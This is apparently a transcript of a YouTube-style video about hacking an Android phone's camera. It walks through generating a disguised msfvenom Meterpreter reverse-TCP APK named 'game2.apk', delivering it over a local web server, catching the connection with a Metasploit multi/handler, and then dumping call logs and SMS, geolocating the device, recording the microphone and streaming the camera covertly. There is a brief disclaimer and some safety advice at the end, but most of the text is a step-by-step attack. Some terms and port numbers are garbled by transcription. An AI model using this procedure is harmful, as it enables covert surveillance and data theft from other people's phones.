Watch how hackers hack your phone camera and they start watching you. So this is my phone screen. Nothing is showing up. Well, watch this. I just gain access to that. When I press that, look at this. This is literally my phone. You can see me here. Hi, I just gained access to that. You can literally see it here. Nothing shows up here, but it's recording everything. And that's how hackers hack your phone camera and they start watching you. Watch this video till the end so I can show you how you can stay safe. All right, before we get started, I have to let you know that this is all for educational purposes and raising awareness for cybersecurity. The whole project has been done in a safe lab. This is my own phone that I'm testing on. You're not allowed to use this against anyone else or any device that you don't own. All right, let's get started. So what we first need to do is that basically we need to create our payload. This payload is basically an application that we are sending to our Android phone, and an Android phone gonna start executing this application or trying to open this application like a normal application. When they do that, we gain access to their device. So how we can do this, we have to use MSF Venom. So I'm just gonna write MSF Venom, and we have to specify what this payload gonna work on. So we're gonna do _ platform, and because it's an Android phone, we're just gonna write Android. We have to add the payload that we're going to use. For that, we're going to use -p, and we're going to add our payload, which is going to be Android/meter preter /reverse _ TCP. And then we need to specify the name of this file. We're going to name it something that doesn't look suspicious. For that, we're going to use -o, and then it's going to be the name. I'm just going to name it game2.apk, which is the format for Android applications. And after that, I'm going to specify the host that I want this target machine get connected to, which is going to be my IP address. For that, I'm just going to check my IP address. I'm going to open a new window, and I'm going to use IPA, and I'm going to give you my IP address, which is 192.168.1.234, and I'm going to put it here, .1234, and I need to specify a port that I want this communication lesson on. So I'm going to use L port, which stands for local port. I'm going to do equal. The default port for platform that we are using is 4444, and you can use any other port, but it needs to be not occupied. It needs to be free. I press enter now, and that's gonna take a couple of seconds, and there we have it. It says save as game2.apac. It shows me the byte size of it as well. I'm just gonna go check if it's there. Here we go, game2.apac. Now I need to find a way to give this application to my target machine. There's a lot of way. I'm not gonna teach you the malicious way because that's not ethical. So I'm just gonna create a temporary web page, and I'm gonna download it on my target machine, which is my phone. For that, I'm just gonna open another page, and I'm gonna run python -m http.server /bind, and I'll put my IP address here. You can specify which port you want to use as well, but if we don't specify any, you're just gonna start listening on port 8000. If I press enter, I can see that it creates me a temporary web page. If I open this web page, you can see that it have all of my directories and all of my folders. It's just sharing it online in my network. If there's another machine on my network, they can load up this page and gain access to all of this directory and application. So I'm just going to go on my phone and download this game2 application that we just created. Just going to open my phone. If I go to my Chrome and write the IP address that we had, http:// I'll put 192.168.1. I have to add the port number, which was 8000. If I press go, you can see that the same directory is going to be shared on this phone as well, and I can download whatever directory that I want. I'm just going to press on game2 application, and it just started downloading that. So I'm just going to open it here, and I'm going to install it. And that is done. I'm just going to press on done, and I'm not going to open it yet because we need to do some more stuff before we run this application. I'm going to open my terminal again. What I'm going to do, I'm going to run a framework called MSF console, which is included loads of payload exploit methods inside of it that you can use to break into a device. It should be already installed on your Kali machine, any Kali machine that you download. It should be already on it. For launching that framework, we're just going to type MSF console, and and they're going to launch it for us. The exploitation that we need to use called multi-handler. Basically, an exploitation that just listens to all of the traffics that are in your network, and if anyone try to get connected, this multi-handler listen to it and allows us to get connected, and we create our meter preacher shell and gain access to that machine. For that, I'm going to use the command search, and I'm going to write multi/handler. As you can see, found it here is number 5, and if I want to use it, I use the command use, and I specify the number of the exploitation, which is 5. Use 5, and it changed the color, which is red. That means I'm using that. I need to add some setting to it to make sure that it's listening at the right port and to the right machine. For that, I'm just going to use show options. It needs a local host, which doesn't have any. It needs a local port. As I said, the default is 444, and we also need to specify the payload as well. So for setting the settings, we just have to use the command set following the name that we want to set. So in this case is lhost, and I'm just going to put my IP address because I want the connection get connected to my machine. So it will be my IP address. I press enter. As you can see, just set it there. Also, I want to set the payload as well. So I write set payload. I use the same payload that I used to create my MSF Venom. So it was Android / meter preacher / reverse underscore TCP, and the payload is set as well. If you use a different port in MSF Venom, you can also set your port as well. You just write set L port and you put the same port that you use when you were creating your payload with MSF Venom. But because I already used the port 444, I don't need to do that. After you've done all of this, all you need to do, you just write run and you press enter. And when you get this, that means we are listening now. So I'm gonna open my Android phone again, and imagine someone send you a link and you don't know, maybe send you an email or you don't know, and you feel like, oh, this is a safe application, this is something that I want to see how does it look like, or maybe it's a game, or maybe it's like a free version of maybe ChatGPT or CapCode or something like that. You get tempted, you just download it and you're trying to see how does it look. So you just press on it, nothing happens in your end. But what happens here, as you can see, my target machine just got connected to me and I've created a meteor preacher shell to it. So that means I basically just got the full access to this Android phone, and I can do so many interesting things now. Let's try some of them here. One interesting thing that you can do, you can get this device location, the exact location. So I'm just gonna write the command for that will be geolocate, and if I press enter, it gives me the exact coordinates where this machine is currently at. And if I just put this in Google Maps, it's gonna show me the address to that as well. You can see how dangerous this method is. Also, if I want to get access to their calls, I can use the command dump underscore call log. And what that do, they're going to basically download all of their call logs, whoever they called, whoever that contacted them, in a TXT file format that I can gain access to. And now if I open my folders here, you can see that call log dump is here. And if I open that, I can see that one time they have called the emergency service. And if they call anyone else, I can get the updated version as well. Let's try one here, huh? And let me just call someone. I'm just gonna make another call again now to the emergency number, because that's this device doesn't have any SIM card in it. It only works on emergency number. If I do the call log again, it's gonna give me another TXT file, and I go over here and I can see this time I've got the number 2999, and it gives me the time, which is here, and it gives me the dates as well. Also, I can see their SMS, their text messages as well. For that, it will be dump underscore SMS. Sorry, I had a typo. Dump SMS, and if I press enter, because this device never had the SMS on it, is not gonna show me anything. Or if they had any, they're gonna make a TXT file again, and you can gain access to that. Another very interesting command is actually you can start listening to their microphone and start recording them. And for doing that, we basically going to use record underscore mic, and we can also specify the duration as well with -D. Like I want to listen for 10 seconds. If I press enter, it tells me it's starting, and it also tells me that audio is saved. It's over here, and if I go back to my folder again, I can see that I've got the audio as well. But because this is a virtual machine, doesn't have any sound, we cannot listen to it. So for me to gain access to the cameras on this phone, I first need to know what cameras are available on this phone. For doing that, I'm gonna write webcam underscore list. And if I press that, it gonna tells me there is a back camera and a front camera, and there's a number behind them, and we can specify which camera we want to record and take picture based on this number. For taking picture, we can use the command webcam underscore snap. And if I want to specify what camera, I have to use -I space the camera. Gonna do the front camera. I'm just gonna hold the phone in front of my face as well. And if I press enter, and there we have it. Such a beautiful picture as well. And that just took a picture of me. And if I want to actually gain access to the camera and see whatever is happening with the camera live, I can use the command webcam underscore stream. Just going to specify the camera again. If I press enter, that's going to open me a page. Just zoom out. I'll use control and scroll back. It's going to be a little bit laggy at the beginning, but it gets better and better as you stay in it. And there we have it, guys. That's the camera. You can see it shows nothing on it. And that's me. Hi. And when you're done with that, all you're going to do, you're going to press Control C and it's going to come out of this stream. And for closing the shell, the meteor predator shell, we're just going to write exit and that's going to bring us out of the session. So there you have it, guys. As you saw, this is such a powerful tool that hackers can use and gain unauthorized access to some devices. The lesson is that you need to watch out what links you click on or what software you download on your devices. It's really important that you know this method so you don't fall for them anymore. Always make sure that your software is updated to the latest version and you have a good antivirus on your phone as well. Another thing is that you always need to pay attention to what permissions the application is asking for. If it's a simple application and is asking for permission to gain access to your camera, to your microphone, to your call logs and your text messages, that means that there's something suspicious going on and you need to get rid of that application immediately. And that's the video for today, guys. I hope that you liked this video. If it was useful for you, make sure that you hit that subscribe button. And if you got any question for me, drop it down in the comment section below. And thanks again for watching and I see you in the next video.